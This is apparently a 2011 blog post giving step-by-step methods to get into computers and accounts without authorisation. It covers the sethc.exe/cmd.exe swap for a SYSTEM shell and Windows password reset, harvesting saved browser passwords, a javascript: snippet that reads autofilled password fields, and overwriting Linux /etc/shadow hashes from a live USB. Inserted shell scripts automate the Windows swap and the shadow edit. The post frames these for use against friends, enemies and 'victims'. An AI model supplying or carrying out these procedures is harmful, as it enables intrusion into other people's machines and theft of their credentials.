Tuesday, May 3, 2011

3 easy ways to bypass/get/break most common passwords!

Number 1 - Windows Vista/7 login password
Scenario
Ok, so you got hold of a computer (of a friend or enemy?) that you want to sneak into, but the damn Windows logon screen comes up and you are unable to step inside.
Idea
Boot the computer from a Linux (read: Ubuntu) live pen drive. Don't ask me how to create a bootable Ubuntu pen drive or how to boot from it; if you need me to tell you these things, this post is not for you. Once booted, open 'Places' in Ubuntu and mount the Windows partition to see the files inside, provided the disk or the files are not encrypted (BitLocker or EFS, on the editions that have them). But who turns on encryption for all their files? I haven't seen anyone who does.
But you don't want to stop here; you want to start Windows without knowing the password. There is a clever trick, but it resets the owner's password rather than revealing it. You may use it to irritate someone by changing their password against their will, or to reset your own password if you have forgotten it. One caveat: a password reset done from outside the account also breaks whatever Windows protected with the old password, so EFS-encrypted files and DPAPI-protected secrets (saved browser and mail passwords, certificates) become unreadable for that user.
The trick uses the same Ubuntu pen drive. After booting, mount the C: drive (or whichever partition holds Windows 7 on the target machine) read-write. Ubuntu's ntfs-3g does this by default, but it refuses to write to a volume that Windows left hibernated, so shut Windows down properly first. Navigate to Windows\System32 and rename sethc.exe to sethc.exe.bak, then copy cmd.exe to a new file named sethc.exe (copy, not rename, so that cmd.exe itself stays in place). The end state is: the original sethc.exe is now sethc.exe.bak, a copy of cmd.exe sits there under the name sethc.exe, and cmd.exe is still present as cmd.exe.
Now reboot the computer and wait for the Windows logon screen. Once it appears, press the Shift key five times. A command prompt window opens. Type the following command and press Enter: net user username new-password. Replace username with the owner's account name (type net user on its own if you need to list the accounts) and new-password with the password you want to set. Voila! You just changed the password of a Windows user without knowing the current one.
How does this work? sethc.exe is the program Windows runs when you press Shift five times: it is the Sticky Keys accessibility helper, and it can be launched from the logon screen, before anyone has signed in. We replaced it with cmd.exe but kept the name sethc.exe, so pressing Shift five times at the logon screen ran cmd.exe with SYSTEM privileges, which is enough to do whatever you want on that machine. Make sure you put the original sethc.exe back once your operation is done.
Moral: you can't stop anyone with physical access from reading your files or resetting your password in Windows unless you encrypt the whole disk (BitLocker with a TPM, for instance, which only releases the disk key when the machine boots its own, unmodified Windows). A BIOS password with USB and CD/DVD boot disabled raises the bar, but only until someone pulls the drive out and mounts it in another machine.
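The file juggling above, written out as a small shell script you would run from the Ubuntu live session. This is an added example, not code from the original post; it assumes the Windows partition has already been mounted read-write (for instance with mount -t ntfs-3g /dev/sda2 /mnt/win, device and mount point being assumptions) and takes that mount point as its argument. The swap refuses to run twice, because a second run would overwrite the backup with cmd.exe and the real sethc.exe would be gone for good.

```shell
#!/bin/sh
# Added example (not from the original post): swap sethc.exe for cmd.exe on a
# mounted Windows partition, and undo the swap afterwards. Assumes the
# partition is already mounted read-write (ntfs-3g) at the path given as $1,
# e.g. /mnt/win (the mount point is an assumption; adjust it to yours).
set -eu

# Usage: sethc_swap /mnt/win
sethc_swap() {
    sys32="$1/Windows/System32"
    [ -f "$sys32/sethc.exe" ] && [ -f "$sys32/cmd.exe" ] || {
        echo "sethc.exe or cmd.exe not found under $sys32" >&2
        return 1
    }
    # Refuse to run twice: a second swap would overwrite the backup with
    # cmd.exe and the original sethc.exe would be lost.
    if [ -e "$sys32/sethc.exe.bak" ]; then
        echo "backup already present, refusing to swap again" >&2
        return 1
    fi
    mv "$sys32/sethc.exe" "$sys32/sethc.exe.bak"
    # cp, not mv: cmd.exe must remain in place under its own name.
    cp "$sys32/cmd.exe" "$sys32/sethc.exe"
}

# Usage: sethc_restore /mnt/win   (run this once you are done)
sethc_restore() {
    sys32="$1/Windows/System32"
    [ -f "$sys32/sethc.exe.bak" ] || {
        echo "no sethc.exe.bak to restore" >&2
        return 1
    }
    mv -f "$sys32/sethc.exe.bak" "$sys32/sethc.exe"
}

# Returns 0 while the swap is in effect (sethc.exe is byte-identical to cmd.exe
# and the backup exists), non-zero otherwise.
sethc_swapped() {
    sys32="$1/Windows/System32"
    [ -e "$sys32/sethc.exe.bak" ] && cmp -s "$sys32/cmd.exe" "$sys32/sethc.exe"
}
```

Run sethc_swap before rebooting into Windows and sethc_restore from the live session afterwards; sethc_swapped tells you which state the partition is in if you lose track.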

Number 2 - Get all the saved passwords of websites from browsers
The trick
This trick exploits the eagerness of browser developers to make their browsers idiot-friendly. I am taking Firefox as the example; the trick works on Chrome and Opera as well. Most people use the browser's Remember Password feature for the sites they visit, unaware that anyone who gets at their computer for even one minute can collect all those passwords in one go. Just open their browser, say Firefox, and open the settings dialog (Edit > Preferences on Linux, Tools > Options on Windows). Go to the Security tab and click the 'Saved Passwords' button. Every saved password can be shown there in plain text. The same works in Chrome. Firefox does offer a master password that encrypts the store and prompts for it before revealing anything, but most people never set one.
Now consider the geeks who don't use the browser's own feature but a nifty little extension called LastPass, available for Chrome, Opera and Firefox (probably for IE too). How secure is that against someone sitting at your unlocked browser? Not much better, because the extension auto-fills the login form, and anything sitting in a form field can be read by script running on that page. Open any site, for example facebook.com; if the Facebook home page appears, log out so that you reach the login screen. You can see that LastPass has filled the password field with asterisks. Now paste the following JavaScript into the address bar, replacing the URL showing there, and press Enter. (Current Firefox and Chrome strip the javascript: prefix from pasted URLs, so there you have to save the code as a bookmarklet or run it from the developer console instead.)
javascript:var oOut,frameSearch=function (oFrame) {if(!oFrame){oFrame=window;}for(var oPass='',i=0,j=oFrame.document.forms;j[i];i++){for(var x=0,y;y=j[i].elements[x];x++){if(y.type=='password'&&y.value){oPass+='\n'+y.value;}}}for(var i=0;oFrame.frames[i];i++){try{oPass+=frameSearch(oFrame.frames[i]);}catch(e){}}return oPass;};void(oOut=frameSearch());if(oOut){alert('The following passwords were found:\n'+oOut);}else{alert('There are no passwords in forms on this page.');}
As soon as you press Enter, the password appears in plain text. Isn't that a serious security concern? Note that this is not a LastPass bug as such: the same code reads any password that a browser or password manager has auto-filled into a form, and a manager that fills only when you explicitly ask it to is that much harder to harvest from this way.
Moral: The password is secure only if it is saved in your brain. But there too it isn't secure if you drink and have a girlfriend whom you love more than your password!!!

Number 3 - Change someone's Linux password!
This one is for those who think Linux is unbreakable. If you have a strong hammer, you can break anything!
Boot the target Linux system from a pen drive containing another live Linux distro. I recommend BackTrack 4 R2. Once booted, mount the partition containing the target's root filesystem (if it is not encrypted). Open a terminal in BackTrack, type passwd, press Enter and type whatever new password you want; this sets root's password on the live system, not on the target. Now open the live system's /etc/shadow, copy the password field from the root line, and paste it over the password field of the root line in the target's /etc/shadow on the mounted filesystem. One snag: on Ubuntu and its relatives the root account is locked (its password field is just !), so there you would rather edit the line of a user who is in the sudo group. Alternatively, chroot into the mounted filesystem and run passwd there (chroot /mnt/target passwd root, the mount point being whatever you chose), which usually writes the target's shadow file for you. If you are confused about where to paste, here is the break-up of each line in the shadow file.
Each line consists of fields separated by the colon symbol; if you know PHP's explode function, explode(":", $line) gives you the fields. The first field is the username and the second is the password hash (an ! or * there means the account is locked). We don't need the rest. The password field looks complex, but it has fields of its own, separated by the $ symbol: the first is the hashing algorithm id ($1$ for MD5-crypt, $5$ for SHA-256-crypt, $6$ for SHA-512-crypt, the default on modern distros), the second is the salt used to hash the password, and the third is the hash itself. Salts make precomputed hash tables useless, since the same password hashes differently on every system; they do not stop someone brute-forcing a single hash. To know more about salts you may search the internet. Because the salt is stored alongside the hash, a hash generated on BackTrack verifies the same way on the target, as long as the target's libc supports that algorithm id. So what you actually do is copy the whole password field generated by BackTrack from its /etc/shadow and paste it over the password field of the corresponding line in the target's /etc/shadow.
Now reboot the computer and, at the login screen of the victim's Linux, enter the newly created password. Voila! You are in.
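The shadow-file surgery above, as a few shell functions you would run from the BackTrack session against the mounted target. This is an added example, not code from the original post. It assumes the target's shadow file path is passed in (for instance /mnt/target/etc/shadow, an assumed mount point) and that the replacement hash comes, as the post describes, from the live system's own /etc/shadow after running passwd there; openssl passwd -6 'NewPassword' produces an equivalent $6$ hash if you prefer not to touch the live system's accounts. The functions show the two levels of fields the text describes: the colon-separated shadow record, and the $-separated algorithm/salt/hash inside its second field.

```shell
#!/bin/sh
# Added example (not from the original post). Operates on the shadow file
# given as $1, e.g. /mnt/target/etc/shadow (the mount point is an assumption).
# The new hash is the whole $id$salt$digest string copied from the live
# system's /etc/shadow after running passwd there, or from:
#   openssl passwd -6 'NewPassword'
set -eu

# Print the password field ($id$salt$digest, or ! / * for a locked account)
# of USER from shadow FILE.   Usage: shadow_hash FILE USER
shadow_hash() {
    awk -F: -v u="$2" '$1 == u { print $2; exit }' "$1"
}

# Split a $id$salt$digest string and print algorithm name, salt and digest on
# three lines.  Only the classic crypt ids are mapped; "$6$rounds=N$..." and
# yescrypt ("$y$...") carry an extra parameter field and are reported as unknown.
# Usage: shadow_hash_fields '$6$salt$digest'
shadow_hash_fields() {
    printf '%s\n' "$1" | awk -F'$' '
        BEGIN      { alg = "unknown" }
        $2 == "1"  { alg = "md5crypt" }
        $2 == "5"  { alg = "sha256crypt" }
        $2 == "6"  { alg = "sha512crypt" }
        { print alg; print $3; print $4 }'
}

# Replace USER's password field in FILE with NEW_HASH, keeping the other eight
# fields, and set the "last changed" day counter (field 3) to today so the
# record stays plausible.  Fails, leaving FILE untouched, if USER is absent.
# Usage: shadow_set_hash FILE USER NEW_HASH
shadow_set_hash() {
    file="$1"; user="$2"; new="$3"
    days=$(( $(date +%s) / 86400 ))
    awk -F: -v OFS=: -v u="$user" -v h="$new" -v d="$days" '
        $1 == u { $2 = h; $3 = d; found = 1 }
        { print }
        END { if (!found) exit 1 }' "$file" > "$file.tmp" || {
        rm -f "$file.tmp"
        echo "user $user not found in $file" >&2
        return 1
    }
    # Write back in place (not mv) so the file keeps its owner and 0640 mode.
    cat "$file.tmp" > "$file"
    rm -f "$file.tmp"
}
```

Check the target line with shadow_hash first: if it prints ! or *, that account is locked and you want a different user, or the unlocked hash from the live system will simply enable the account.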
Moral: If you want to be safe from hackers cracking down your passwords and stealing your data then don't use a computer. Migrate to Himalayas and do some tapasya there.